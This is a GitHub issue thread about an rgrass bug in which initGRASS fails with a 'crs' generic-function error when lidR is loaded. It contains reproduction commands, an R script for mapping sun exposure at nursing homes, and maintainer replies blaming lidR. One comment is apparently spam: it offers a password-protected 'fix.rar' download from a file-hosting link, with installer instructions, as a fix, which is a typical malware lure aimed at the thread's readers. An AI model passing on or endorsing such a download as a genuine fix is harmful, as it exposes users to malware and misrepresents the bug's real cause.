### ISSUE TITLE
`initGRASS` may stop with "no generic function found for 'crs'"

### ISSUE THREAD

**Issue by Kodiologist** [rsbivand/rgrass#95]
```
$ R --no-save -q --vanilla -e 'rgrass::initGRASS("/usr/lib/grass83", home = tempdir(), SG = terra::rast(), override = T)'
[…] # No issue
$ R --no-save -q --vanilla -e 'lidR::readLAS; rgrass::initGRASS("/usr/lib/grass83", home = tempdir(), SG = terra::rast(), override = T)'
> lidR::readLAS; rgrass::initGRASS("/usr/lib/grass83", home = tempdir(), SG = terra::rast(), override = T)
function (files, select = "*", filter = "") 
{
    if (filter == "-h" | filter == "-help") {
        rlas:::lasfilterusage()
        return(invisible())
    }
    UseMethod("readLAS", files)
}
<bytecode: 0x5a7fb97679a8>
<environment: namespace:lidR>
Error in getMethod("crs", "SpatRaster") : 
  no generic function found for 'crs'
Calls: <Anonymous> -> getMethod
Execution halted
$ R --no-save -q --vanilla -e 'lidR::readLAS; library(terra); rgrass::initGRASS("/usr/lib/grass83", home = tempdir(), SG = terra::rast(), override = T)'
[…] # No issue
```

I'm using:

- Ubuntu 24.04
- GRASS 8.3.2
- R 4.3.3
- rgrass 0.4.3
- terra 1.7.78
- lidR 4.1.2

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rsbivand** [comment]
The problem appears to be in `lidR`, please raise there. Please also provide a regular script, not using Rscript.

**Comment by Kodiologist** [comment]
I don't know what a "regular script" is, but the above is from using the normal R binary, not Rscript.

**Comment by rsbivand** [comment]
To be run in interactive R at the R prompt.

**Comment by Kodiologist** [comment]
That would need some way to reset the state of all packages (I think) which isn't fully implemented (I think).

**Comment by Kodiologist** [comment]
Loading lidR seems to be necessary to reproduce the bug. The original code in which I encountered this bug uses lidR nontrivially. I changed it to a trivial use here to make the example minimal.

**Comment by rsbivand** [comment]
Provide a minimal example actually doing something. Could you create the GRASS location first, then use `lidR`?

**Comment by Kodiologist** [comment]
To be clear, I don't expect you to find a workaround for me. I already have one, which is to say `library(terra)`. I just filed a bug report because I thought it might be useful.

> Could you create the GRASS location first, then use `lidR`?

Maybe? The trick is that I'm creating the location using a raster that's generated by lidR.

> Provide a minimal example actually doing something.

Here's a little incomplete script I've been working on. It doesn't do anything useful yet. The idea is to use GRASS's `r.sun` to map sun exposure at the nursing homes.

```R
library(sf)
library(terra)

grass.path = "/usr/lib/grass83"
las.dir = "/tmp"
las.crs = "epsg:6568"
crs.lonlat = "epsg:4326"
las.buffer.ft = 500.

nursing.homes = list(
    list(name = "Kingston Center for Rehabilitation and Nursing",
        lon = -71.61699, lat = 41.54679,
        las.files = "USGS_LPC_RI_Statewide_D22_295000_167500.laz"),
    list(name = "Mikaela Esau",
        lon = -71.59471, lat = 41.67216,
        las.files = c("USGS_LPC_RI_Statewide_D22_300000_212500.laz", "USGS_LPC_RI_Statewide_D22_302500_212500.laz")))

for (l in nursing.homes)
   {coords = st_coordinates(st_transform(crs = las.crs, st_as_sf(
        data.frame(l$lon, l$lat), coords = c(1, 2), crs = crs.lonlat)))
    dsm = lidR::rasterize_canopy(
        res = 1,
        algorithm = lidR::pitfree(),
        las = lidR::readLAS(
            file.path(las.dir, l$las.files),
            select = "xyzr",
            filter = do.call(sprintf, c(list("-keep_xy %d %d %d %d"), round(
                coords[c(1, 2, 1, 2)] +
                c(-1, -1, 1, 1) * las.buffer.ft)))))
    w = rgrass::initGRASS(grass.path,
        home = tempdir(), SG = dsm, override = T)}
```

**Comment by Kodiologist** [comment]
Yeah, this seems to be a lidR issue.
